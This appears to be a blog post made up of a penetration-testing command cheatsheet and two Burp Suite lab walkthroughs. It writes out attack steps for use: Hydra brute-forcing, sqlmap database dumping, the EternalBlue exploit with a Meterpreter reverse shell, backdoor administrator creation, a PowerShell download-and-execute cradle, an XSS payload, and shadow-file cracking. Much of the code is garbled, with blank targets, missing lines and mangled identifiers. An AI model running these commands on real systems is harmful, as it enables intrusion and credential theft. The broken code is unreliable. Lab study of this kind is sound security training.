
Cheatsheet v0.0

In this little piece, I have tried to list some useful commands.


Identifying  the IP Address of a website:


Tracking the packet travelling (number of hops) between two machines:


Nmap open port, filtered port and traceroute details:

sudo nmap –script=firewalk –traceroute

Nmap ping sweep:

nmap -sn

Nmap TCP sweep:

nmap -sT

Nmap regular scan:


Nmap intense scan with OS/version detection, NSE scan, traceroute:

nmap -T4 -A -v

Nmap anonymous login scan on FTP server script:

nmap -p 21 –script ftp-anon

Nmap OS fingerprinting:

sudo nmap -O

Nmap SMB OS discovery with one NSE script:

nmap –script smb-os-discovery

Nmap SMB analysis with all NSE scripts (= “–script”):

nmap -sC

Bash script to look up open FTP ports and accomplish dictionary attack on them:

#Nmap Host Identification
echo “Range to scan:”
read ip_range
map -sP $ip_range -oG out.txt
cat out.txt | grep Up > out1.txt
cat out1.txt | cut -d ” ” -f2 > open.txt

#Nmap FTP scan
nmap -p 21 ‘cat open.txt’ -oG final.txt
cat final.txt | grep open > ftp.txt
echo “”
echo “Identified machines with FTP open:”
cat ftp.txt | cut -d ” ” -f2

#FTP Dictionary Attack
echo “”
read ip_addr hydra -L /home/pentester/wordlists/Usernames.txt -P /home/pentester/wordlists/passwords.txt ftp://$ip_addr
echo “”
echo “Login tries on machines:”
read ftp_ip
ftp $ftp_ip

Portscan with Dmitry:

dmitry -pf

Banner grabbing with Dmitry:

dmitry -pb

Banner grabbing with Python:

$ python (Python shell start)

>>> import socket (obtain the required socket library)

>>> bangrab = socket.socket(socket.AF_INET,socket.SOCK_STREAM) (bangrab variable call to store the content of the created socket; the socket type is TCP base on the SOCK_STREAM; after the socket is created, it can be manipulated with the appropriate function calls)

>>> bangrab.connect((“”,22)) (connect function is used to identify the address and port for the connection)

>>> bangrab.recv(4096) (the receive statement receives the data from the socket)

>> exit()

Web connection with Python:

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect ((“”,80))
# send a basic http request
s.send(“GET / HTTP/1.0\nHost:\n\n”)
page = “”
# while data is still coming back, append to our page variable
while 1:
data = s. recv(1024)
if data == “”:
page = page + data
# close our socket and print the results
print page

Python client script:

import socket
target_host = “”
# replace the IP address with the machine you want to connect to
target_port = 9999
# create a socket object
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect the client
# send some data

Python TCP client script:

import socket
target_host = “”
# replace the IP address with the machine you want to connect to
target_port = 80
# create a socket object
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect the client
# send some data
client.send(“GET / HTTP/1.1\r\n Host:\r\n\r\n”)
# receive some data
response = client.recv(4096)
print response

Python server script:

import socket
import threading
bind_ip = “”
bind_port = 9999
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print “[*] Listening on %s:%d” % (bind_ip,bind_port)
# this is our client-handling
def handle_client(client_socket):
# print out what the client sends
request = client_socket.recv(1024)
print “[*] Received: %s” % request
# send back a packet
while True:
client,addr = server.accept()
print “[*] Accepted connection from: %s:%d” % (addr[0],addr[1])
# spin up our client thread to handle incoming data
client_handler = threading.Thread(target=handle_client,args=(client,))

Python sniffer script:

import socket
import os
# host to listen on
host = “”
# create a raw socket and bind it to the public interface
if == “nt”:
socket_protocol = socket.IPPROTO_IP
socket_protocol = socket.IPPROTO_ICMP
sniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket_protocol)
# we want the IP headers included in the capture
sniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
# if we’re using windows, we need to send an IOCTL to set up promiscuous mode
if == “nt”:
sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)
# read in a single packet
print sniffer.recvfrom(65565)
# if we’re using Windows, turn off promiscuous node
if == “nt”:
sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)

Nmap scan with Python:

$ python3
>>> import nmap
>>> nm = nmap.PortScanner()
>>> nm.scan(‘’, ‘53,443,3306,60000’)
>>> nm.all_hosts() (listing the hosts)
>>> nm.command_line() (showing the Nmap command)

Python Windows process listing from Powershell:

PS C:\Program Files\Python39> python
>>> import wmi
>>> conn = wmi.WMI()
>>> for class_name in conn.classes:
…             if ‘Process’ in class_name:
…             print(class_name)

Python Windows process listing from Powershell:

PS C:\Program Files\Python39> python
>>> import wmi
>>> conn = wmi.WMI()
>>> for process in conn.Win32_Process():
…             print(“ID: {0}\nHandleCount: {1}\nProcessName: {2}\n”.format(process.ProcessId, process.HandleCount, process.Name))

Python Windows service listing from Powershell:

PS C:\Program Files\Python39> python
>>> import wmi
>>> conn = wmi.WMI()
>>> for s in conn.Win32_Service(StartMode=”Auto”, State=”Running”):
…             print(s.State, s.StartMode, s.Name, s.DisplayName)

Python Windows service start/stop from Powershell:

PS C:\Program Files\Python39> python
>>> import wmi
>>> conn = wmi.WMI()
>>> for s in conn.Win32_Service(StartMode=”Auto”, State=”Stopped”):
          if ‘Update’ in s.Name:
               result, = s.StartService()
               if result == 0:
                    print(“Successfully started service:”, s.Name)

Python full Windows enumeration script (network domain, interface MAC, interface IP, subnet mask, system profiles, system operation, architecture, computer name, registered user):

C:\Users\Admin> python C:\Users\Admin\Desktop\

import wmi

     for netParams in wmi.WMI () .Win32_NetworkAdapterConfiguration ():
          if netParams.MACAddress != None and netParams.IPAddress != None and netParams.IPSubnet != None:
               if netParams.DNSDomain != None:
                    print(“Domain: “, netParams.DNSDomain)
               print(“mac: “, netParams.MACAddress.lower)
               print(“ip: “, netParams.IPAddress[0])
               print(“mask: “, netParams.IPSubnet[0])
     for profileParams in wmi.WMI ().Win32_NetworkLoginProfile ():
          if profileParams.Name !=None:
               print(“Profile: “, profileParams.Name)
     for SOParams in wmi.WMI ().Win32_OperatingSystem ():
          print(“Operation System: “, SOParams.caption)
          print(“Computer Name: “, SOParams.CSName)
          print(“Architecture: “, SOParams.OSArchitecture)
          print(“User Registered: “, SOParams.RegisteredUser)
except Exception as e:

     print (e)

Web scrapping with Python using BeautifulSoap:

$ python3
>>> import requests
>>> page = requests.get(“”)
>>> page
>>> page.status_code
>>> page content
>>> from bs4 import BeautifulSoup
>>> soup = BeautifulSoup(page.content, ‘html.parser’)
>>> print(soup.prettify())
>>> list(soup.children)
>>> [type(item) for item in list(soup.children)]
>>> soup.findAll(‘a’)
>>> soup.find(‘a’)
>>> soup.findAll(‘p’)
>>> for url in soup.find_all(‘a’):
>>> print(soup.get_text())
>>> body = soup.body
>>> for paragraph in body.find_all(‘a’):
…         print(paragraph.text)

Webextraction with Python:

$ cat

#!/usr/bin/Python 3
from bs4 import BeautifulSoup
import requests as req
resp = req.get(“”)
soup = BeautifulSoup(resp.text, ‘lxml’)

Nmap scan from Metasploit:

$ sudo msfdb init

$ sudo msfconsole

msf6 > db_status

msf6 > workspace -a nmapscan (adding an Nmap scan workspace)

msf6 > db_nmap -sP (live system Nmap discovery scan)

msf6 > db_nmap -sS (Nmap portscan on the live systems)

msf6 > db_nmap -sV (Nmap services scan on live systems)

msf6 > db_nmap -sA (Nmap full enumeration on live systems)

msf6 > services

msf6 > hosts

msf6 > hosts -c address,os_flavor

msf6 > hosts -c address,os_flavor -S Linux

msf6 > use auxiliary/scanner/portscan/tcp (import the scans results into Metasploit)

msf6 > hosts -c address,os_flavor -S Linux -R (import the scans results into Metasploit)

msf6 > show options (checking the import)

msf6 > run

msf6 > services -c name,info -S http (search hosts for services with HTTP in the name)

Nmap scan import to Metasploit and evaluation:

$ sudo msfdb init

$ sudo msfconsole

msf6 > use auxiliary/scanner/http/http_version

$ nmap -sC -oX nmapscan.xml

msf6 auxiliary (scanner/http/http_version) > db_import /home/nmapscan.xml

msf6 auxiliary (scanner/http/http_version) > hosts

msf6 auxiliary (scanner/http/http_version) > services

msf6 auxiliary (scanner/http/http_version) > services -c name,info

Nmap scan via proxychains using proxyserver from Metasploit:

sudo msfdb init

sudo msfconsole

msf6 > search socks

msf6 > use auxiliary/server/socks4a

msf6 > info (optional)

msf6 > set SRVPORT 9050 (or whatever is there..)

msf6 > run

$ sudo netstat -atn (checking whether the server is running)

$ sudo proxychains nmap -sT (TCP connect scan via proxychains)

Website scan with Whatweb:

sudo -v whatweb (with verbosity)

Whatweb scan report:

whatweb –log-verbose=scan_report

WordPress website user enumeration scan with wpscan:

wpscan –url –enumerate u

WordPress website theme enumeration scan with wpscan:

wpscan –url –enumerate t

WordPress website plugin enumeration scan with wpscan:

wpscan –url –enumerate p

SqlMap extraction of the list of all databases with using captured vulnerable POST request:

sqlmap -u “” –method POST –data “POST Request” –dbs

SqlMap extraction of the “specificdb” datatable:

sqlmap -u “” –method POST –data “POST request” -D specificdb –tables

SqlMap extraction of all entries from the “specificdb” database table:

sqlmap -u “” –method POST –data “POST request” -D specificdb -T specificdbentries –dump

Web application scanning with Wmap from Metasploit:

sudo service postgresql start

sudo msfdb init

sudo msfconsole

msf6 > load wmap

msf6 > wmap_sites -a (this is to domain)

msf6 > wmap_targets -t (this is the IP-address of the domain)

msf6 > wmap_targets -l (checking the targets)

msf6 > wmap_run -e (running the enumeration)

msf6 > wmap_vulns -l (checking the results)

Ruby ARP scanner:

require ‘socket’
s =
254.times do |i|
     next if i == 0
     s.send(“test”, 0, “192.168.10.” + i.to_s, 53)

f =“/proc/net/arp”,’r’)
data =“\n”)
up_hosts = []
data.each do llinel
     entry = line.split(/\s+/)
     next if entry[3] == “00:00:00:00:00:00”
     next if entry[0] == “IP”
     up_hosts << {:ip => entry[0], :mac => entry[3]}

print “Active network hosts\n”
print “%-12s\t%s\n” % [“IP Addr” , “MAC Address”)

up_hosts.each do lhostl
     print “%-12s\t%s\n” % [host[:ip], host[:mac]]

Listing the last login attempts with Ruby:

data = ‘last’.split(“\n”)
users = []
hosts = []
data.each do IlI
     if l == “”
     elsif l.start_with? “reboot”
     elsif l.start_with? “wtmp”
          users << l[0,8].rstrip
          hosts << l[17,16].rstrip.lstrip


until users.empty?

     print “User: %s\n” % users.pop

while not hosts.empty?
     print “Host : %s\n” % hosts.pop

Grabbing the web banner with Ruby (IP-address to be added after the command):

require ‘net/http’
def getHeader(host,port = nil)
port = port || 80

Net::HTTP.start(host.to_s,port) do lhttpl
resp = http.head(‘/’)
return [resp[‘server’].to_s, resp[‘Last-Modified’].to_s]

return [nil,nil]


if ARGV.size <= 0 ll ARGV.size > 2
print “Usage: #{$0) Host [Port]\n”



server, modified = getHeader(ARGV[0],ARGV[1])

print “Server #{ARGV[0]}:#{ARGV[1] || 80}(#{server}) last modified #{modified}\n”

Extracting file system information with Ruby (works with root privileges):


require ‘etc’

pid = ARGV[0].to_i

cwd = File.readlink(“/proc/#{pid}/cwd”)

owner = File.stat(“/proc/#{pid}/cmdline”).uid

file =“/proc/#{pid}/cmdline”)

cmdline =“\000”)


filename = cmdline.shift

print “Process #{pid) is owned by #{Etc.getpwuid(owner).name}\n”

print “Process #{pid} CWD: #{cwd}\n”

print “Process #{pid} Command: #{filename} #{cmdline.join(‘ ‘)} \n”

Ruby client script:


require ‘socket’

host = ‘localhost’

xss_loc = “<script src=’http://Iocalhost:8080/’></script>;”

malicious_request = “GET / HTTP/1.1

Host: #{host}

User-Agent: #{xss_loc}


s =‘localhost’,80)

s.print malicious_request

print “Got response:\n”

while line = s.gets

print line

break if line.downcase.include? ‘</html’



Ruby server script example:


require ‘socket’

banner = “HTTP/1.1 200 OK

Date: 11/09/2023 00:00:00 GMT

Content-Length: 0

Connection: close

Content-Type: text/html\n\n”

server =‘Iocalhost’,8080)

loop {
client = server.accept
req = client.recv(1024).split(“\r\n”)

headers = {}

req.each do |l|

k, v = l.split(‘:’,2)
headers[k] = v

print “#{} – #{client.peeraddr.last}\n”
print “\t#{headers[‘Referer’]} – #{headers[‘User-Agent’]}\n”

client.puts banner


Netdiscover passive sniffing of the network interface of our own machine:

sudo netdiscover -i eth0 -p

Netdiscover active scan of a network range via a given network interface:

sudo netdiscover -i eth0 -r

FW bypass scan of the top 100 ports with Hping using the SYN TCP flag (-S):

sudo hping3 -S -c 100 -p ++1

Sending ICMP type 8 code 0 echo request to a target with Hping:

sudo hping3

hping send {ip(daddr=,code=0)}

Starting a query with Hping with setting the time-to-live (TTL) at 5, and then increment it by 1 when it sends an ICMP echo request:

sudo hping3

foreach i [list 5 6 7 8 9 10] {hping send “ip(daddr=,ttl=$i)+icmp(type=8,code=0)”}

Scanning a target with Hping for open ports and services:

sudo hping3 –scan known -S

Scanning a specific port range of the target with Hping:

sudo hping3 –scan ‘0-3000’ -S

Dumping all TCP traffic on a network interface:

sudo tcpdump -i eth0

Dumping all TCP traffic on a network interface in verbose mode showing the contents in both hex and ASCII:

sudo tcpdump -i eth0 -x -vv | grep ICMP

Dumping all TCP traffic in a format of hex on a network interface with no hostname resolution:

sudo tcpdump -i eth0 -nX 

FTP login:


Passive OS fingerprinting with p0f:

sudo p0f -i any -p -o /tmp/sniff.log (traffic to the victim via another channel is necessary)

RPC (Remote Procedure Call) enumeration to detect NFS and mountd services:

rpcinfo -p

Discovering NFS (Network File System) shares listed in [/etc/exports] file of the remote machine:

showmount -e

Mounting the victim’s [/home] directory on the attacker’s [/mnt] directory:

sudo mount -t nfs /mnt -o nolock (“-t” specifies the type of the file system (NFS); “nolock” disables the file locking)

Reading a file in the locally mounted folder of the target computer:

cd /mnt

ls -l

cat administrator/Documents/secret.txt

Enumerate the logged on users on the remote machine using Finger client:

finger @

Logging into the Finger service of the remote machine as Admin:

finger Admin@

Logging into the Finger service of the remote machine as Admin with Telnet:

telnet 79



Smb MS17_010 Eternalblue exploit via Metasploit pivoting:

sudo msfdb init

sudo msfconsole

msf6 > search ms17-010

msf6 > use exploit/windows/smb/ms17_010_eternalblue (on Linux targets “distccd” might work)

msf6 > set RHOST

msf6 > run

meterpreter > ipconfig (checking the connections if exploit is successful)

meterpreter > run post/multi/manage/autoroute OPTION=s (adding a route to the subnet which is present in the connections)

meterpreter > run autoroute -p (verification of the route)

meterpreter > background (or “CTRL+Z” to move the session to the background)

meterpreter > set PAYLOAD windows/shell/bind_tcp (the other route will not be seen, so autoroute will deal with it..)

meterpreter > run


Basic BASH queries:

cut -d’ ‘ -f2 wordlists.txt (cutting out the 2nd column of a wordlist)

cat /proc/cpuinfo (CPU info cut)

sudo find /home -mmin -5 (listing the files modified in the last 5 minutes)

sudo find /home -mtime -1 (listing the files modified in the last 24 hours)

sudo xxd -s 35 -l 50 wordlists.txt (dumping the words from the 15th till the 50th in hexadecimal format from the wordlists text file)

printf ‘A’ | xxd (converting “A” into hexadecimal format)

printf 0x41 | xxd -r (converting from hex to ASCII)

printf ‘A’ | xxd -b (converting “A” into binary)

sudo egrep -a -o ‘\b[[:print:]]{2,}\b’ /sbin/ifconfig – string search (regex string search in the “ifconfig” file)

sudo egrep -a -o ‘\b[[:print:]]{2,}\b’ /sbin/ifconfig | sort -u (regex string search in the “ifconfig” file then removing the duplicates with the sort tool)

curl (simple client request)

curl -svo /dev/null (curl recon with error suppression)

curl -H ‘User-Agent: TEST’ ‘X-My-Header-Test: CLIENTZZZ’ (user agent header tailoring)

dd if=/dev/zero of=testfile_10MB bs=10485760 count=1 (file creation from the terminal)

tail -f /var/log/syslog (syslog file check)

cat access.log | grep index.php | more (piping out the logs and looking for specific keywords)

dmesg | grep network (piping out the network related kernel messages)

Password cracking with John using “nt” format:

sudo john –format=nt /home/pentester/hashes.txt

Remote Desktop connection from existing meterpreter shell:

meterpreter > run getgui -e (enabling RDP on the target machine)

meterpreter > run getgui -u testuser -p testpass@123 (creating testuser user on the target machine)

xfreerdp /u:testuser /p:cpentpw@123 /v: (RDP from terminal)

Simple Metasploit reverse shell steps on the attacker machine after transferring the malicious payload and before triggering it:

msf6 > use exploit/multi/handler

msf6 > set payload windows/meterpreter/reverse_tcp 

msf6 > set lhost

msf6 > run

meterpreter > shell

Binary analysis:

$ find / -executable -type f (searching for executable files)

$ ls -alt /bin/ (listing all the binaries)

$ updatedb; locate ‘cat’ (locate tool database update and searching for all files with “cat” in the name)

$ ps -ef (listing all running processes by all users and full format)

$ for i in $(find / -executable -type f);do file -i $i | grep -i ‘x-executable; charset=binary’;done (displaying only the executable binaries)

$ file -i thisistobecracked (show the results as strings for the mime type and mime encoding of the binary)

file thisistobecracked (basic info about the file e.g. format, architecture, binary representation)

rabin2 -I thisistobecracked (extracting more info about the binary; “-I” flag – Info)

strings thisistobecracked (looking for printable strings in the file e.g. “pass”)

xxd thisistobecracked | more (hexadecimal or binary dump of a file)

rabin2 -z thisistobecracked (checking the strings in the file from the data section; “-z” flag – strings)

radare2 thisistobecracked (starting a binary reverse-engineering framework)

[in radare2] > pdf @ main (“p” – printing blocks; “d” – debugger; “f” – flag at current address; password processor functions could be interesting like “strcmp”)

gdb thisistobecracked (running the file in a C-debugger)

gdb-peda$ disassembly-flavor intel (setting the display style of the disassembly code to Intel)

gdb-peda$ disassemble main (dumping the assembler code of the “main” function)

gdb-peda$ break *0x0605471a (setting up a break point at a potentially interesting “strcmp” instruction occured in the dump)

gdb-peda$ run (running up to the break point set up)

ndisasm -a -p intel binary (loading a disassembler to check file components)

objdump -d /bin/bash (loading another  disassembler to check file components)

objdump -d -M intel /bin/bash (loading another  disassembler to check file components)

objdump -f /bin/bash (file header check)

objdump -j .text -s /bin/bash (checking the full contents of the code sections)

objdump -x /bin/bash (checking all the headers)

readelf -h binary (general info of a binary; “-h” – header)

readelf -h object.o (general info of an object)

readelf -l binary (segmentation info; “-l” – program headers)

readelf -S binary (segmentation info; “-S” – section headers)

readelf -s binary (symbol table check; “-s” – symbol)

readelf -p binary (string dump; “-p” – string)

readelf -R .text binary (relocation of the bytes corresponding to the sample “text”; “-R” – relocated dump)

readelf -x .text binary (dumping of the bytes corresponding to the sample “text” but the output is in hexadecimal; “-x” – hex dump)

readelf -a -W binary (full info of file with program headers, section headers, symbols, relocations, dynamic section, version information, architecture, file type [exe/object file]; “-a” – all; “-W” – wide output)

Address Space Layout Randomization management:

sysctl kernel.randomize_va_space (ASLR verification)

sudo sysctl -w kernel.randomize_va_space=0 (ASLR switch off)

sudo sysctl -w kernel.randomize_va_space=2 (ASLR switch on)

Set-UID to root:

$ sudo -i (run login shell as the target user)

$ chown root targetfile (changing the owner of the targetfile to root)

$ chmod 4755 targetfile (4-> the binary will be executed as the owner; 7-> the owner of the file has read/write/executed permissions; 5-> the group can read and execute; 5-> any user can read and execute)

$ ls -lart targetfile (verifying that the sticky bit is set; should come back as: -rwsr-xr-x)

Linking “/bin/sh” to another shell to get root:

$ sudo ln -sf /bin/zsh /bin/sh

Powershell info gathering and privesc

User implant:

PS C:\Users\Administrator> net user (checking users)

PS C:\Users\Administrator> net user /domain (checking all users from a group)

PS C:\Users\Administrator> net user tom /domain (checking Tom’s groups)

PS C:\Users\Administrator> net user tom password /add (adding Tom and his password)

PS C:\Users\Administrator> net localgroup administrators tom /add (adding Tom to the administrators group)

Checking the running processes:

PS C:\Users\Administrator> tasklist /svc | more (initial step of memory analysis)

PS C:\Users\Administrator> tasklist /svc | findstr svchost.exe | more (review a specific process and the services that the process has started)

Execution policy management:

PS C:\Users\Administrator> Get-ExecutionPolicy (checking the global execution policy)

PS C:\Users\Administrator> Get-ExecutionPolicy -List | Format-Table -AutoSize (review the execution policies in place)

PS C:\Users\Administrator> Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope LocalMachine (lifting the restriction on the local machine)

PS C:\Users\Administrator> Set-ExecutionPolicy -ExecutionPolicy Unrestricted (lifting the restrictions)

PS C:\Users\Administrator> get-service | where { $_.Status -eq “running” } | select-object -last 10 (listing the last 10 active services on the local machine)

Granting remote administration:

PS C:\Users\Administrator> winrm quickconfig (confirm it with “y”)

PS C:\Users\Administrator> winrm set winrm/config/service/auth ‘@{Basic=”true”}’ (switching the profile to “Private” – step 1)

PS C:\Users\Administrator> winrm set winrm/config/client/auth ‘@{Basic=”true”}’ (switching the profile to “Private” – step 2)

PS C:\Users\Administrator> winrm set winrm/config/service ‘@{AllowUnencrypted=”true”}’ (switching the profile to “Private” – step 3)

PS C:\Users\Administrator> Set-Item WSMan:\localhost\Client\TrustedHosts -value “*” -Force (switching the profile to “Private” – step 4)

Different methods to run a process (calculator) with Powershell using a simple script (2 lines):

01 Write-Host “Testing Execution Bypass”
02 calc.exe

PS C:\Users\Administrator> Get-Content ./test.ps1 | powershell.exe -noprofile (piping the script)

PS C:\Users\Administrator> powershell -nop -c “iex(New-Object Net.WebClient).DownloadString(‘test.ps1’)” (piping the script)

PS C:\Users\Administrator> powershell -command “Write-Host ‘This is a bypass test’ ; calc.exe” (using the command switch)

PS C:\Users\Administrator> Get-Content .\test.ps1 | Invoke-Expression (invoking the expression command)

PS C:\Users\Administrator> powershell -ExecutionPolicy Bypass -File .\test.ps1 (with direct file restriction bypass)

PS C:\Users\Administrator> Set-ExecutionPolicy Bypass -Scope Process (with setting the Scope)

Python script to get the running processes remotely:

import winrm
# Place Script Here
script = “””
Get-WmiObject Win32_Service | Where-Object {$_.State -eq “Running”}
ses = winrm.Session(‘’, auth=(‘ADMINISTRATOR’,’Pa$$w0rd’))
r = ses.run_ps(script)
print (r.std_out)
print (r.std_err)

Python script to extract the newest 10 items from each event logs:

import winrm
# Place Script Here
script = “””
Get-EventLog -List | ForEach-Object { Get-EventLog $_.Log -Newest 10 }
ses = winrm.Session(‘’, auth=(‘ADMINISTRATOR’,’Pa$$w0rd’))
r = ses.run_ps(script)
print (r.std_out)
print (r.std_err)


Checking using Netstat whether a specific service is running from CLI:

C:\Users\Admin> netstat -an | findstr 502 (Modbus protocol check)

Nmap Modbus discovery in subnet:

$ sudo nmap -sS -p502

Nmap Modbus (SCADA Slave) machine scan skipping the discovery phase:

$ sudo nmap –script modbus-discover.nse -p502 -Pn

Metasploit Modbus process:

sudo msfdb init

sudo msfconsole

msf6 > db_status

msf6 > search modbus

msf6 > use auxiliary/scanner/scada/modbusdetect

msf6 > set RHOSTS

msf6 > run

msf6 > use auxiliary/scanner/scada/modbus_findunitid

msf6 > set RHOSTS

msf6 > set UNIT_ID 8

msf6 > run

Hash cracking:

sudo john –format=nt /home/pentester/hashes.txt

Hydra SSH Dictionary attack:

hydra -L /home/pentester/Wordlists/Usernames.txt -P /home/pentester/Wordlists/Passwords.txt ssh

File compile from C:

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil 

Unshadow passwords incase copy-paste allowed across machines:

$ cat /etc/passwd (reveal user accounts on victim and copy data)

$ touch password.txt (create local password file and paste data from clipboard)

$ cat /etc/shadow (reveal shadow file on victim and copy data)

$ touch shadow.txt (create local shadow file and paste data from clipboard)

$ unshadow password.txt shadow.txt > unshadow (unshadow passwords into ‘unshadow’ file)

$ export CPUID_DISABLE=1 (disable x86 CPU query which is a bug in John)

$ sudo john unshadow (cracking the passwords with John)

Linux firewall inbound traffic block:

sudo iptables -P INPUT DROP

Linux firewall rules check:

sudo iptables -L

Linux firewall delete all rules (flush):

sudo iptables -F

Linux firewall allow all inbound traffic:

sudo iptables -P INPUT ACCEPT

Linux firewall ACL-type passive ICMP block configuration:

sudo iptables -A INPUT -j REJECT –reject-with icmp-host-prohibited

Wireshark filtering traffic to only HTTP requests :


Wireshark filtering traffic from a specific source:

ip.src ==

Wireshark filtering traffic to a specific destination:

ip.dst ==

Wireshark filtering for all open ports:

tcp.flags.syn == 1 and tcp.flags.ack == 1

Wireshark filtering for any packet that has data in it and have the Push flag set:

tcp.flags.push == 1

Wireshark filtering for Modbus protocol:

tcp.port == 502

IOT firmware analysis:

sudo file firmware.bin (file type check)

sudo hexdump -c firmware.bin | more (hex trace check of the firmware image identifiers e.g. file system signatures like “Squashfs”)

sudo binwalk -e firmware.bin (extracting the file system from the firmware image and look into the files inside e.g. boardDataWW.php)

sudo python3 sources/extractor/ -b Cisco -sql -np -nk “” images (extracting the filesystem only; “-b” – Cisco brand; “-sql” – SQL server at; “-np” – no parallel operation; “-nk” – no kernel; “images” – storing the tarball in images)

sudo python3 scripts/ -i 1 -f images/1.tar.gz (loading the contents of the filesystem of a firmware into a database and populating the object and object_to_image tables)

sudo bash scripts/ 1 (creating a disk image for a firmware)

sudo bash scripts/ 1 (creating a disk image for a firmware)

Windows information gathering

From CLI:

C:\Users\Admin\Downloads> netstat -atn (connections check)

C:\Users\Admin\Downloads> net view /all (connections check)

C:\Users\Admin\Downloads> netstat -abno | findstr 9999 (specific port check)

C:\Users\Admin\Downloads> tasklist /svc | findstr 1672 (process check; this one and the one above works well together during cross-referencing which process has an open port)

C:\Users\Admin\Downloads> ifconfig (connections check)

From Meterpreter:

meterpreter > run winenum

meterpreter > run scraper

Linux information gathering

From terminal:

$ uname -a (operating system related information)

$ lsb_release -a (operating system related information)

$ cat /etc/lsb_release -a (operating system related information)

$ lscpu (architecture information)

$ cat /proc/cpuinfo (cpu info check)

gdb -q /bin/bash (processor info gathering with debugger)

gdb-peda$ break main (break point set up at the main function of bash)

gdb-peda$ run

gdb-peda$ info registers (register info of the processor, this could be important when analysing Endianness)

gdb-peda$ nexti

gdb-peda$ info registers

gdb-peda$ x/s $rip (on 64-bit systems)

Printing files in a specified directory with Perl:

$ cat

print “$_\n”;

Perl  server script for remote connection:

$ cat

use IO::Socket;
use strict;
use warnings;
my $socket = new IO::Socket::INET (
LocalHost => ‘localhost’,
LocalPort => ‘12345’,
Proto => ‘tcp’,
Listen => 1,
Reuse => 1,
die “Could not create socket: $!n” unless $socket;
print “Waiting for the client to send datan”;
my $new_socket = $socket->accept();
while(<$new_socket>) {
print $_;

Perl  client script for remote connection:

$ cat

use strict;
use warnings;
use IO::Socket;
my $socket = new IO::Socket::INET (
PeerAddr => ‘localhost’,
PeerPort => ‘12345’,
Proto => ‘tcp’,
die “Could not create socket: $!n” unless $socket;
print $socket “Hello this is socket connection!n”;

Curl web scraping with Perl:

$ cat

#!/usr/bin/perl -w
system(“curl -s &”);
print “This print function came AFTER the curl request!\n”;

Thanks for reading and as always, any feedback is most welcome.

Walkthrough of the Burp Suite Other Modules Web Application pentesting room focusing on the practical sections.

Decoder Encoding/Decoding

We have already gone through the general features, Repeater and the Intruder functions of Burp Suite but there are a few other modules worth exploring. The Decoder module not only facilitates the encoding/decoding functions of Burp Suite but the creation of data hashsums and some other features are also part of its functionalities. After sending the GET request to Decoder from the context menu we are able to manipulate the data available.

We could encode a complete GET request to Base64 if we wanted to.

However, this is not we use it for. Apart from the Plain and Base64– which is used to encode any data in an ASCII compatible format to be suitable to transfer over virtually any medium- we can see URL, HTML, ASCII-hex, Hex, Octal, Binary and Gzip options in the dropdown menu. URL encoding is used to secure data to transfer in the URL of a web request. It is about swapping characters for their ASCII character code in hexadecimal format preceded by a percentage symbol (%). Encoding text as HTML entities involves replacing special characters with an ampersand (&) followed by a hex number or reference to the escaped character and then a semi-colon (;). ASCII-Hex converts data between ASCII and hexadecimal format. The Hex, Octal and Binary encoding options only apply to numeric inputs. Gzip provides data compression.

What is the base64 encoded version of the “Let’s Start Simple” text?

URL Decode this data: %4e%65%78%74%3a%20%44%65%63%6f%64%69%6e%67 ?

Use Smart Decode to decode this data: &#x25;&#x33;&#x34;&#x25;&#x33;&#x37; what is the decoded text?

Encode this phrase: Encoding Challenge.Start with base64 encoding. Take the output of this and convert it into ASCII Hex. Finally, encode the hex string into octal.

What is the final string?

Decoder Hashing

The decoder module also gives us the option to generate hashsums for any entered data. What is the SHA-256 hashsum of the phrase “Let’s get Hashing!” converting it to ASCII Hex string to answer the question.

Let’s generate an MD4 hashsum of the phrase “Insecure Algorithms” and encode that as base64 to answer the question.

Let’s look at an in-context example downloading the file attached to this task. The problem specification is “Some joker has messed with my SSH key! There are four keys in the directory, and I have no idea which is the real one. The MD5 hashsum for my key is 3166226048d6ad776370dc105d40d9f8 — could you find it for me?”. Let’s not to forget to hit an ENTER after the “—–END OPENSSH PRIVATE KEY—–” line. Submit the correct key name as your answer.


Comparer allows us to compare two pieces of data, either by ASCII words or by bytes. Let’s capture a test login request first and send it to the Repeater.

In the Repeater let’s change the credentials to support_admin/w58ySK4W and then send it to Comparer. After comparing the responses by word we can see the differences.


Sequencer makes it possible to measure the entropy (randomness) tokens (strings that are used to identify something) and should be generated in a cryptographically secure manner. For example, we might want to examine the randomness of a session cookie or a Cross-Site Request Forgery (CSRF) token protecting a form submission. If it turns out that those tokens are not generated safely, then we can predict the values of the tokens to come. Let’s send our usual request from the admin login page to the Sequencer with our usual right-click.

After starting a “Live capture” we can analyze the tokens and get an overall result; the effective entropy; an analysis of the reliability of the results; and a summary of the sample taken.

Thanks for reading and as always, any feedback is most welcome.

Walkthrough of the Burp Suite Intruder Web Application pentesting room focusing on the practical sections.


We have already gone through the general features and Repeater function of Burp Suite. This piece will cover the Intruder primary module which is basically its fuzzing tool. The Intruder module can be used to apply the previously captured request as a template to send many more requests with slightly altered values automatically. There are four attack types, Sniper, Battering Ram, Pitch Fork and Cluster Bomb. When conducting a sniper attack, we provide one set of payload for each payload position (e.g. username + password) one after the other. With this we could bruteforce into a known account. The Battering Ram attack uses also one payload and puts it into all the positions, but not one after the other but all at the same time. The Pitchfork attack uses one payload set per position (up to a maximum of 20) and iterates through them all at once, simultaneously. The last attack type of Burp Suite is called Cluster Bomb which iterates through each different payload sets individually to ensure all possible combinations of payloads are tested.

Practical Example

Let’s navigate to [/support/login] page and start capturing the traffic with some test data entered into the fields. Then let’s send it to the Intruder module from the Proxy and also switch the attack type to “Pitchfork” from the dropdown menu.

After this let us load the downloaded credentials into the Payload Sets, No.1 being the username list and No.2 would be the password list.

After starting the attack a new window will open with all the requests made. There are two options to figure out which one is successful. Login request would give us 200 response codes, and failed login requests would provide us with 401s. Due to the fact that now we are only given 302 redirects for all requests, a second option would be workable which is identifying differences in the length of responses. All we need to do is find the length which stands-out and utilize the credentials that belong to it and we are in.

